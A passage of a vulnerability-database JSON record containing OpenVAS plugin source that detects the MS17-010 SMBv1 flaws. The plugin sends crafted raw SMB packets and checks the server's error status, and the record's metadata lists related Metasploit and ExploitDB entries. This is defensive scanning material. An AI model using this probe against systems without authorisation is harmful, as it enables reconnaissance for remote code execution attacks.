script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_resp = \"\";\nsmb_sess_andx_resp = \"\"; \nsmb_trans_resp = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) + \n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42, \n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00, \n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02, \n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c, \n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{ \n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\t\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:43:34"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "244d68ec657b636c86fe57a1aa696cdc6a6f8d8103247a890e61e5e5926f6e81", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-06T14:30:35", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"modified": "2019-05-06T14:30:35", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 